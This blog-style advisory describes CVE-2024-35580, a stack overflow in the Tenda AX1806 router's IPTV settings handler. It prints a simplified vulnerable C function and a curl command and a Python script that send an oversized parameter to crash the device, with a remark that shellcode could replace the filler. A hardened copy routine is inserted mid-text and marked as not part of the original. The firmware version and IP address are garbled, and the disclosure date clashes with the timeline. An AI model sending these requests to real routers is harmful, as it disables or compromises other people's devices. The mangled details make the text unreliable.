In June 2024, a new vulnerability identified as CVE-2024-35580 was disclosed, affecting the popular Tenda AX1806 router (firmware v1...1). This security flaw is critical as it allows remote attackers to trigger a stack overflow through the adv.iptv.stbpvid parameter in the formSetIptv function. In this post, we break down what CVE-2024-35580 means, how an exploit would work, and what steps users should take to stay protected.
What is CVE-2024-35580?
CVE-2024-35580 describes a specific stack overflow vulnerability in Tenda AX1806 routers running firmware version 1...1. The problem lies in the formSetIptv backend function, which mishandles user input from the adv.iptv.stbpvid parameter—failing to check for input length, which can let a malicious actor overwrite memory and potentially execute code.
Vulnerability Details
When a user configures IPTV settings through the router’s web panel, a POST request is sent that updates various parameters, including adv.iptv.stbpvid. The formSetIptv function copies this parameter to a stack-based buffer without verifying its length, meaning a long input can overwrite important memory areas.
Here’s a simplified view of what might happen in the Tenda AX1806 firmware code:
```c
void formSetIptv(webs_t wp, char_t *path, char_t *query)
{
    char stbpvid[32]; // <<-- Buffer is only 32 bytes
    ...
    strcpy(stbpvid, websGetVar(wp, "adv.iptv.stbpvid", "")); // No length check!
    ...
}
```
The attacker sends a long string to adv.iptv.stbpvid, overflowing the buffer.
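For contrast with the simplified snippet above, here is a hardened version of the copy step. It is an added example, not Tenda's code and not part of the original write-up. The names copy_param_checked and parse_stbpvid are hypothetical, and treating the field as a decimal VLAN ID in 1..4094 is an assumption.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define STBPVID_BUF 32  /* same size as the stack buffer in the simplified view */

/* Copy src into dst only if it fits, terminator included. Oversize input is
 * rejected, not truncated, so the handler never acts on a partial value.
 * Returns 0 on success, -1 on rejection. */
int copy_param_checked(char *dst, size_t dst_size, const char *src)
{
    if (dst == NULL || dst_size == 0)
        return -1;
    dst[0] = '\0';
    if (src == NULL)
        return -1;
    /* memchr stops at the first NUL and never scans more than dst_size bytes. */
    const char *end = memchr(src, '\0', dst_size);
    if (end == NULL)
        return -1;                      /* length >= dst_size: would overflow */
    memcpy(dst, src, (size_t)(end - src) + 1);
    return 0;
}

/* Hypothetical replacement for the strcpy() step. Assumption: the field is a
 * decimal VLAN ID in 1..4094. Returns the ID, or -1 if the input is rejected. */
int parse_stbpvid(const char *value)
{
    char stbpvid[STBPVID_BUF];
    char *rest;
    long id;

    if (copy_param_checked(stbpvid, sizeof stbpvid, value) != 0)
        return -1;
    if (stbpvid[0] < '0' || stbpvid[0] > '9')
        return -1;                      /* empty, signed, or non-numeric */
    id = strtol(stbpvid, &rest, 10);
    if (*rest != '\0' || id < 1 || id > 4094)
        return -1;
    return (int)id;
}

int main(void)
{
    char big[301];                      /* constructed oversize input */
    memset(big, 'A', 300);
    big[300] = '\0';
    printf("\"100\" -> %d, 300 x 'A' -> %d\n", parse_stbpvid("100"), parse_stbpvid(big));
    return 0;
}
```

Rejecting the request outright, instead of truncating with strncpy, keeps the handler from storing a value the user never sent.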
1. Gaining Access
The attacker needs access to the device’s admin web panel. This could be local, or remote if the panel is exposed via the internet.
2. Crafting the Malicious Request
The core of the attack is sending a POST request with an oversized adv.iptv.stbpvid value (such as hundreds of "A" characters, plus malicious shellcode).
Example cURL exploit:
```bash
curl -X POST http://192.168..1/goform/formSetIptv \
  -d "adv.iptv.stbpvid=$(python3 -c 'print("A"*100)')"
```
In a real attack, the "A"*100 could be replaced with shellcode to execute system commands.
- Denial of Service: Crashes the router, requiring a reboot.
- Arbitrary Code Execution: In carefully crafted attacks (where exact memory layout is known), the attacker could hijack the control flow and run their own code.
- Full Device Compromise: Infection with persistent malware, data interception, or using the router as part of a botnet.
The following Python script automatically sends a malicious payload to a Tenda AX1806 admin panel:
```python
import requests

# Change to your router IP and credentials
URL = "http://192.168..1/goform/formSetIptv"
payload = {
    "adv.iptv.stbpvid": "A" * 300  # 300 'A's to cause overflow
}
r = requests.post(URL, data=payload)
print(f"Status: {r.status_code}")
```
You’ll need to be authenticated for this to work (add session cookies if necessary).
How to Protect Yourself
1. Update Firmware: Check Tenda’s official support page for patches or newer firmware. If your device is EOL, consider replacing it.
2. Restrict Admin Access: Do not expose the admin panel to the internet. Only allow management from inside your network.
Conclusion
CVE-2024-35580 is a serious vulnerability affecting the Tenda AX1806, making it possible for attackers to crash or take over your router via a simple interface bug. Patch as soon as possible, and check your network security basics to minimize risk. If you’re interested in routers or security research, try recreating similar exploits in a safe, isolated lab to see how stack overflows can lead to system compromise.
Timeline
Published on: 05/20/2024 18:15:10 UTC
Last modified on: 08/20/2024 14:35:23 UTC